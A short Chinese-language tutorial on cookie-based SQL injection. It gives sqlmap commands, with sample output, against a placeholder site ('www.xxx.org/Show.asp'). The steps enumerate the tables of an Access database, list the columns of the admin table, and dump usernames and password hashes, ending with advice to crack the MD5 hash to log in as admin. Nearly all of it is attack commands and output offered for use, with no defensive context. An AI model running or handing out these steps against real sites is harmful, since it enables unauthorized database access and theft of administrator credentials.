Cookie注入:
1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.
2.sqlmap命令提示符下输入下列内容进行跑表。
sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2
假设返回内容如下,说明是access数据库。
------------------------- [INFO] resuming back-end DBMS 'microsoft access' -------------------------
设置线程数:10
假设返回结果:
-------------------------------------------
[ 4 tables] +----------------------+ admin
mark
province
vote +----------------------+
找到四个表分别为:admin mark province vote
3.猜表的字段名:
sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --columns -T admin --level 2
假设找到admin表的字段如下:
id username password
--------------------------------- [INFO] retrieved: id
[INFO] retrieved: username
[INFO] retrieved: password ----------------------------------
4.猜测字段的内容:
sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --dump -T admin -C "username,password" --level 2
获取结果:
[INFO] retrieved: 1
[INFO] retrieved: admin
[INFO] retrieved: 21232f297a57a5a743894a0e4a801fc3 (32位MD5加密密文)
账号:admin 密码:将密文解密即可。